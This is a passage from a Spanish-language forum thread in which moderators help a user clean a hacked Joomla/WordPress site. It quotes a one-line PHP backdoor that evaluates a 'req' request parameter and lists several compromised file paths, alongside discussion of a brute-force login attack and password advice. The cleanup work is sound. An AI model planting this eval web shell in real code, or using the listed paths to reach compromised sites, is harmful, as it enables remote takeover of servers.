elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  Mi Wordpress Hackeado		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 Ir Abajo Respuesta Imprimir
Autor Tema: Mi Wordpress Hackeado  (Leído 36,959 veces)
ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #90 en: 25 Julio 2014, 04:59 am »
Cita de: #!drvy en 25 Julio 2014, 04:50 am
Si se me olvido mencionarlo..

El archivo esta en

peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php

La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código
  1. <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD

Saludos

MUCHAS GRACIAS POR LA ACLARACIÓN Y POR TODO. Como dijo MinusFour, espero que esa línea no la utilicen para nada no?

Cita de: MinusFour en 25 Julio 2014, 04:54 am
¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.

Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.

Del mismo archivo dices o de cual?
Debo comentarlas tambien como hizo arriba !#drvy??
En línea
#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #91 en: 25 Julio 2014, 05:00 am »
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

Código:
/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=

Saludos
En línea
ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #92 en: 25 Julio 2014, 05:04 am »
Cita de: #!drvy en 25 Julio 2014, 05:00 am
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

Código:
/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=

Saludos

Uff, que mal. Tienes razón con que es un nido de malware esto!!
Debo comentarlas como has hecho tu o lo estás modificando vos?
Como tienes el acceso no se si solo lo ves, o lo estás modificando jajaj. Avisame asi si no lo modificas tu, lo hago yo.
Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...
En línea
#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #93 en: 25 Julio 2014, 05:06 am »
Citar
Debo comentarlas como has hecho tu o lo estás modificando vos?

He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Citar
Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos
En línea
MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #94 en: 25 Julio 2014, 05:10 am »
Cita de: #!drvy en 25 Julio 2014, 05:06 am
He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos

¿Crees que haya más backdoors por ahi? Si quieres le doy un vistazo.
En línea
ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #95 en: 25 Julio 2014, 05:20 am »
Cita de: #!drvy en 25 Julio 2014, 05:06 am
He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos

Y bueno entonces si ya está todo al parecer? Creo que debería estar todo OK y sin problemas, espero que por un buen tiempo
Que no venga MinusFour a decir unas líneas más jajajaja.
He actualizado el Joomla de peritaje de arte a la versión 3.3.2 (La última que me recomendaba!!!)

Si hemos terminado aqui, quiero darle las gracias por todo su tiempo, esfuerzo y dedicación para un "desconocido" como yo. Tanto a ti como a MinusFour, sin duda, valoro muchísimo su tiempo y les agradezco de corazón la ayuda prestada!!!

Si estarían por aqui los invitaría una cerveza a cada uno xDD.

Bueno espero que hayamos terminado, Y MIL GRACIAS!!
En línea
#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #96 en: 25 Julio 2014, 05:32 am »
En un principio si aunque hay que analizar el joomla por si tiene mas .. "secretos".

Dile a tu amiga que te lo pague bien xD


Saludos
En línea
MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #97 en: 25 Julio 2014, 07:46 am »
Parece ser que el 4 de julio le hicieron un ataque de fuerza bruta a la pagina de login de wordpress. Un ataque de mas de 9000 intentos en dos horas... pero no estoy seguro si consiguieron la password o no. Por lo que veo cuando el usuario se loguea lo redirecionan a wp-admin y nunca paso esto, pero a saber si el programita sigue los headers del HTTP.
En línea
ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #98 en: 25 Julio 2014, 16:37 pm »
Cita de: MinusFour en 25 Julio 2014, 07:46 am
Parece ser que el 4 de julio le hicieron un ataque de fuerza bruta a la pagina de login de wordpress. Un ataque de mas de 9000 intentos en dos horas... pero no estoy seguro si consiguieron la password o no. Por lo que veo cuando el usuario se loguea lo redirecionan a wp-admin y nunca paso esto, pero a saber si el programita sigue los headers del HTTP.

Y bueno, esto es una lotería igual. Con todo lo que tocamos ayer, espero que haya "tapado" al menos por un tiempo. El Wordpress y el Joomla están actualizados. #!drvy
 pudo limpiar los virus y creo que estaría todo "OK".

O que más aconsejan? Moverle el login a otra parte? o algo así?
Los sigo escuchando muchachos. GRACIAS!
En línea
MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #99 en: 25 Julio 2014, 17:15 pm »
Lo único que recomiendo es que los admins y usuarios con permisos tengan passwords únicas y seguras. De las urls de joomla no pude encontrar nada más, las examine todas porque eran pocas y fuera de esas entradas raras no encontre nada.

De wordpress muchas llamadas a un archivo systemcash.php y me parece que dijo #!drvy que lo habían borrado. Puede ser que el archivo haya sido subido por FTP pero obviamente esto no aparecera en el log de apache.

Esto lo he visto en otro foro, posts desde hace un mes:

Citar
We recently saw this exact named file show up on a few wordpress sites. In every case it was uploaded via FTP login.

http://www.webhostingtalk.com/showthread.php?t=1387485
« Última modificación: 25 Julio 2014, 17:17 pm por MinusFour » En línea
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
RIN.ru Hackeado
Juegos y Consolas 		::GD:: 3 3,782 Último mensaje 30 Marzo 2005, 03:57 am
por ::GD::
Ataque DDoS a WordPress : WordPress sufre el mayor ataque DDoS
Noticias 		wolfbcn 0 4,636 Último mensaje 4 Marzo 2011, 13:17 pm
por wolfbcn
Me han hackeado
Seguridad 		###almohadilla 1 2,699 Último mensaje 4 Abril 2014, 09:50 am
por dRak0
[WordPress] ¿ Cómo añadir una entrada en WordPress 3.8.2 ?
Desarrollo Web 		0x5d 3 5,181 Último mensaje 12 Abril 2014, 06:47 am
por 0x5d
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines